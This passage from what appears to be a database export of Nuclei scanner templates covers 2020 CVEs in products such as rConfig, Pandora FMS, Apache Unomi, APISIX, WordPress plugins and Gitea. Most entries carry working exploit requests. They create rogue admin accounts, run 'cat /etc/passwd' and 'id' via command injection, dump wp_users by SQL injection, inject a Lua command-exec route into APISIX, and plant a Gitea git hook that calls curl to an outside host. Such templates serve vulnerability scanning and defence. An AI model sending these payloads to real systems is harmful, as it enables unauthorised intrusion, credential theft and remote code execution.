CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-13405\n cwe-id: CWE-306\n epss-score: 0.01002\n epss-percentile: 0.81964\n cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: microweber\n product: microweber\n shodan-query: http.html:\"microweber\"\n tags: cve,cve2020,microweber,unauth,disclosure\n\nhttp:\n - raw:\n - |\n POST /module/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Referer: {{BaseURL}}admin/view:modules/load_module:users\n\n module={{endpoint}}\n\n payloads:\n endpoint:\n - \"users/controller\"\n - \"modules/users/controller\"\n - \"/modules/users/controller\"\n matchers:\n - type: dsl\n dsl:\n - 'contains(body,\"username\")'\n - 'contains(body,\"password\")'\n - 'contains(body,\"password_reset_hash\")'\n - 'status_code==200'\n - 'contains(header,\"text/html\")'\n condition: and\n# digest: 4a0a0047304502203be4d7f5e6cf689779af0571cd7edda9bf8975e0a39de1da9a717cdacffd438c022100c9e14eb45b1c3245277acdf5ad2abab89ea79fd9fac04a3de2d9acfd1d80f272:922c64590222798bb761d5b6d8e72950", "hash": "09232d6e3b7ef04972ac04c268bd2415", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308185" }, "name": "CVE-2020-13483.yaml", "content": "id: CVE-2020-13483\n\ninfo:\n name: Bitrix24 <=20.0.0 - Cross-Site Scripting\n author: pikpikcu,3th1c_yuk1\n severity: medium\n description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability.\n reference:\n - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558\n - https://twitter.com/brutelogic/status/1483073170827628547\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13483\n - https://github.com/afinepl/research\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-13483\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.43845\n cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: bitrix24\n product: bitrix24\n tags: cve2020,cve,xss,bitrix,bitrix24\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'\n - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '*/)});function __MobileAppList(){alert(1)}//'\n - \"function(handler){};function __MobileAppList(test){alert(document.domain);};//\"\n condition: or\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c969dd14c4d494d022ccf2ee1851599d1a39f7853ce81508bbd20845162ddd8002205f3fb9d87eb78e066c23780860090f71d04bbfcc09ec204574049849d98b144c:922c64590222798bb761d5b6d8e72950", "hash": "2de027d0ab782114b55113c5bc602396", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308186" }, "name": "CVE-2020-13638.yaml", "content": "id: CVE-2020-13638\n\ninfo:\n name: rConfig 3.9 - Authentication Bypass(Admin Login)\n author: theamanrawat\n severity: critical\n description: |\n lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.\n reference:\n - https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13638\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13638\n cwe-id: CWE-269\n epss-score: 0.39352\n epss-percentile: 0.97152\n cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rconfig\n product: rconfig\n shodan-query: http.title:\"rConfig\"\n tags: cve,cve2020,rconfig,auth-bypass,intrusive\nvariables:\n username: \"{{to_lower(rand_text_alpha(5))}}\"\n password: \"{{rand_text_alphanumeric(12)}}!\"\n email: \"{{rand_base(8)}}@{{rand_base(5)}}.com\"\n\nhttp:\n - raw:\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb\n\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"username\"\n\n {{username}}\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"passconf\"\n\n {{password}}\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"password\"\n\n {{password}}\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"email\"\n\n {{email}}\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"editid\"\n\n\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"add\"\n\n add\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"ulevelid\"\n\n 9\n --01b28e152ee044338224bf647275f8eb--\n - |\n GET /login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&pass={{password}}&sublogin=1\n\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - \"rConfig - Configuration Management\"\n - \"Logged in as\"\n - \"dashboadFieldSet\"\n condition: and\n\n - type: word\n part: header_3\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e7f135f57aac986c270d66ef6afc8f90e89fd565b52145eb6316f4a20da0e4b5022100876e3b9f1953ea0c2910db7241c0c1297552adc50ced66724b0c4758e85e790f:922c64590222798bb761d5b6d8e72950", "hash": "bd3ea9d6468814d337982a658211c392", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308187" }, "name": "CVE-2020-13700.yaml", "content": "id: CVE-2020-13700\n\ninfo:\n name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference\n author: pikpikcu\n severity: high\n description: |\n WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.\n impact: |\n An attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials.\n remediation: |\n Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches.\n reference:\n - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5\n - https://wordpress.org/plugins/acf-to-rest-api/#developers\n - https://github.com/airesvsg/acf-to-rest-api\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13700\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-13700\n cwe-id: CWE-639\n epss-score: 0.01831\n epss-percentile: 0.86908\n cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: acf_to_rest_api_project\n product: acf_to_rest_api\n framework: wordpress\n tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Content-Type: application/json'\n\n - type: word\n part: body\n words:\n - 'acf-to-rest-api\\/class-acf-to-rest-api.php'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ede93ae3d2d8a4369c76f47926f8a7bfc48d7b70334665a791cc4bb1f71ee4da0220213c5e3ad599f7bf140e15447a3589c31f7791d3afb2ea66c2570100213bb2c6:922c64590222798bb761d5b6d8e72950", "hash": "7ba545b27591cfddc43cbd730b3bb428", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308188" }, "name": "CVE-2020-13820.yaml", "content": "id: CVE-2020-13820\n\ninfo:\n name: Extreme Management Center 8.4.1.24 - Cross-Site Scripting\n author: tess\n severity: medium\n description: |\n Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Extreme Management Center.\n reference:\n - https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219\n - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136\n - https://gtacknowledge.extremenetworks.com\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13820\n - https://documentation.extremenetworks.com/release_notes/netsight/XMC_8.5.0_Release_Notes.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-13820\n cwe-id: CWE-79\n epss-score: 0.00289\n epss-percentile: 0.65704\n cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: extremenetworks\n product: extreme_management_center\n shodan-query: title:\"Extreme Management Center\"\n tags: cve2020,cve,xss,extremenetworks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"autofocus onfocus='alert(document.domain)\"\n - \"Extreme Management Center\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203b2fba8721ad31fdedf35ac64fd1aa9f3daf248c5a28d0e177bc476aef75fc3b02207c1ceaaceaae8e7f5b2fb30ff8a741683dff8b8466099618f50ab7e864979a62:922c64590222798bb761d5b6d8e72950", "hash": "79c3e9f9df0c1f7aa0263c67429e66fa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308189" }, "name": "CVE-2020-13851.yaml", "content": "id: CVE-2020-13851\n\ninfo:\n name: Artica Pandora FMS 7.44 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: |\n Artica Pandora FMS 7.44 allows remote command execution via the events feature.\n reference:\n - https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13851\n - https://www.coresecurity.com/advisories\n - https://github.com/hadrian3689/pandorafms_7.44\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-13851\n cwe-id: CWE-78\n epss-score: 0.96952\n epss-percentile: 0.99674\n cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: pandorafms\n product: pandora_fms\n shodan-query: title:\"Pandora FMS\"\n tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms\n\nhttp:\n - raw:\n - |\n POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*:0:0:'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n - \"PHPSESSID=\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022058dede621391a5c5aa3cbab99614f6e05eb1c25d174cb444fc225088cfc531a3022100d43ab48e876ed266cffa72d5a17bcaf610d3d10d131b046556958fd7be786cf1:922c64590222798bb761d5b6d8e72950", "hash": "a911266b08d7fa0e3a91e16b304d452c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818a" }, "name": "CVE-2020-13927.yaml", "content": "id: CVE-2020-13927\n\ninfo:\n name: Airflow Experimental <1.10.11 - REST API Auth Bypass\n author: pdteam\n severity: critical\n description: |\n Airflow's Experimental API prior 1.10.11 allows all API requests without authentication.\n impact: |\n Allows unauthorized access to Airflow Experimental REST API\n remediation: |\n From Airflow 1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references.\n reference:\n - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E\n - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html\n - https://airflow.apache.org/docs/1.10.11/security.html#api-authenticatio\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13927\n - http://packetstormsecurity.com/files/174764/Apache-Airflow-1.10.10-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13927\n cwe-id: CWE-1188\n epss-score: 0.96246\n epss-percentile: 0.99489\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: airflow\n shodan-query: title:\"Airflow - DAGs\" || http.html:\"Apache Airflow\"\n tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/experimental/latest_runs'\n\n matchers:\n - type: word\n part: body\n words:\n - '\"dag_run_url\":'\n - '\"dag_id\":'\n - '\"items\":'\n condition: and\n# digest: 490a00463044022039773e3df5e30a54dfb047b567020f8006e6597a61396e83cb36083fa06404a602203435f7eb2403447cd3c27da2a7077ecde3b5ea1c3a9079a9574e26a7831f06b8:922c64590222798bb761d5b6d8e72950", "hash": "107f4cb6dfb3c94dd9ad92925693a19b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818b" }, "name": "CVE-2020-13937.yaml", "content": "id: CVE-2020-13937\n\ninfo:\n name: Apache Kylin - Exposed Configuration File\n author: pikpikcu\n severity: medium\n description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.\n impact: |\n An attacker can gain sensitive information from the exposed configuration file, potentially leading to further attacks.\n remediation: |\n Secure the configuration file by restricting access permissions and implementing proper access controls.\n reference:\n - https://kylin.apache.org/docs/release_notes.html\n - https://s.tencent.com/research/bsafe/1156.html\n - https://lists.apache.org/thread.html/rc592e0dcee5a2615f1d9522af30ef1822c1f863d5e05e7da9d1e57f4%40%3Cuser.kylin.apache.org%3E\n - https://github.com/Al1ex/CVE-2020-13937\n - https://github.com/HimmelAward/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-13937\n cwe-id: CWE-922\n epss-score: 0.97421\n epss-percentile: 0.99929\n cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: kylin\n tags: cve,cve2020,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/kylin/api/admin/config\"\n\n headers:\n Content-Type: \"application/json\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: word\n part: body\n words:\n - config\n - kylin.metadata.url\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210092081ead1b869e9dda724782ee4de965bc0f0e116474ed366f8d370a14dbb07d02204a4b6cb67c83309c810d2b386aab64f87d5aa13bb183687f94890e463204b1a4:922c64590222798bb761d5b6d8e72950", "hash": "7afc077e133b15a8346fa0f86fa8bf2a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818c" }, "name": "CVE-2020-13942.yaml", "content": "id: CVE-2020-13942\n\ninfo:\n name: Apache Unomi <1.5.2 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n Apache Unomi allows conditions to use OGNL and MVEL scripting which\n offers the possibility to call static Java classes from the JDK\n that could execute code with the permission level of the running Java process.\n This vulnerability affects all versions of Apache Unomi prior to 1.5.2.\n impact: |\n Successful exploitation of this vulnerability can allow an attacker to execute arbitrary code on the affected server.\n remediation: Apache Unomi users should upgrade to 1.5.2 or later.\n reference:\n - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/\n - https://twitter.com/chybeta/status/1328912309440311297\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13942\n - http://unomi.apache.org./security/cve-2020-13942.txt\n - https://lists.apache.org/thread.html/r4a8fa91836687eaca42b5420a778ca8c8fd3a3740e4cf4401acc9118@%3Cusers.unomi.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13942\n cwe-id: CWE-74,CWE-20\n epss-score: 0.97256\n epss-percentile: 0.99818\n cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: unomi\n tags: cve,cve2020,apache,rce\nvariables:\n id: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/context.json\"\n\n body: |\n {\n \"filters\": [\n {\n \"id\": \"{{id}}\",\n \"filters\": [\n {\n \"condition\": {\n \"parameterValues\": {\n \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n },\n \"type\": \"profilePropertyCondition\"\n }\n }\n ]\n }\n ],\n \"sessionId\": \"nuclei\"\n }\n\n headers:\n Content-Type: \"application/json\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n - \"context-profile-id\"\n condition: and\n\n - type: regex\n part: body\n regex:\n - \"(profile|session)(Id|Properties|Segments)\"\n - \"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205096ac7dee1e5786c667edd38a53a33296046edc498c114bd6a311c7245137cd02201175f746a924dd45e76b455251d1fd79904cf2bba02e3b238be06836d0acff08:922c64590222798bb761d5b6d8e72950", "hash": "975880914e24ca88a29bc8f1255c60e8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818d" }, "name": "CVE-2020-13945.yaml", "content": "id: CVE-2020-13945\n\ninfo:\n name: Apache APISIX - Insufficiently Protected Credentials\n author: pdteam\n severity: medium\n description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data.\n impact: |\n The vulnerability could result in unauthorized access to sensitive information, leading to potential data breaches or unauthorized actions.\n remediation: |\n Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945\n - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E\n - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13945\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-13945\n cwe-id: CWE-522\n epss-score: 0.00838\n epss-percentile: 0.81705\n cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: apisix\n tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix\n\nhttp:\n - raw:\n - |\n POST /apisix/admin/routes HTTP/1.1\n Host: {{Hostname}}\n X-API-KEY: edd1c9f034335f136f87ad84b625c8f1\n Content-Type: application/json\n\n {\n \"uri\":\"/{{randstr}}\",\n \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f = assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close() \\n end \\nreturn _M\",\n \"upstream\":{\n \"type\":\"roundrobin\",\n \"nodes\":{\n \"interact.sh:80\":1\n }\n }\n }\n - |\n GET /{{randstr}}?cmd=id HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"action\":\"create\"'\n - '\"script\":'\n - '\"node\":'\n condition: and\n\n - type: status\n status:\n - 201\n\n extractors:\n - type: regex\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n# digest: 4b0a00483046022100efbf11bb66cb565f79edd3f4a95a75ca6939ca6c573155b78208a326bae668400221009ed2eceab8a745e0240bfe7e993f27535e64fdb38bc0758e3f0b33fb42d75345:922c64590222798bb761d5b6d8e72950", "hash": "a2dab43dc49716fe8d60ecb2aa5ebdbb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818e" }, "name": "CVE-2020-14092.yaml", "content": "id: CVE-2020-14092\n\ninfo:\n name: WordPress PayPal Pro <1.1.65 - SQL Injection\n author: princechaddha\n severity: critical\n description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability.\n reference:\n - https://wpscan.com/vulnerability/10287\n - https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14092\n - https://wordpress.org/plugins/payment-form-for-paypal-pro/#developers\n - https://wpvulndb.com/vulnerabilities/10287\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-14092\n cwe-id: CWE-89\n epss-score: 0.66877\n epss-percentile: 0.97643\n cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ithemes\n product: paypal_pro\n framework: wordpress\n tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - '\"user_login\"'\n - '\"user_email\"'\n - '\"user_pass\"'\n - '\"user_activation_key\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220228a7ef9ce78fa7167394c98b977980223593a12a9e32003d6358a8d430fd731022100a4933847321f98d16080b14432d7315b1d3f1e97ca00bfe877d28bf9fae00765:922c64590222798bb761d5b6d8e72950", "hash": "6624b55634e0ae67490638651ab71533", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818f" }, "name": "CVE-2020-14144.yaml", "content": "id: CVE-2020-14144\n\ninfo:\n name: Gitea 1.1.0 - 1.12.5 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: |\n Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states \"This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.\"\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Fixed in version 1.16.7.\n reference:\n - https://dl.gitea.io/gitea/1.16.6\n - https://github.com/go-gitea/gitea/pull/13058\n - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14144\n - https://docs.github.com/en/enterprise-server@2.19/admin/policies/creating-a-pre-receive-hook-script\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2020-14144\n cwe-id: CWE-78\n epss-score: 0.97181\n epss-percentile: 0.99775\n cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 7\n vendor: gitea\n product: gitea\n shodan-query: html:\"Powered by Gitea Version\"\n tags: cve2020,cve,rce,gitea,authenticated,git,intrusive\n\nhttp:\n - raw:\n - |\n GET /user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n - |\n GET /repo/create HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /repo/create HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n - |\n POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n - |\n GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: body_1\n words:\n - \"Gitea:\"\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - name=\"_csrf\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: auth_csrf\n group: 1\n regex:\n - name=\"_csrf\" content=\"(.*)\"\n internal: true\n\n - type: regex\n name: last_commit\n group: 1\n regex:\n - name=\"last_commit\" value=\"(.*)\"\n internal: true\n# digest: 4a0a00473045022100e398d9d82ff8b9b88f71c78ed86a11cd12d18203426a0f2396f654d19d04022a0220753f0b26dc09689a5afbbb739a698e8340f6bb5296ac8e88f3fc93d75ab2cd3c:922c64590222798bb761d5b6d8e72950", "hash": "45870d0e6dcff9a0445c43ef9b5de47b", "level": 5, 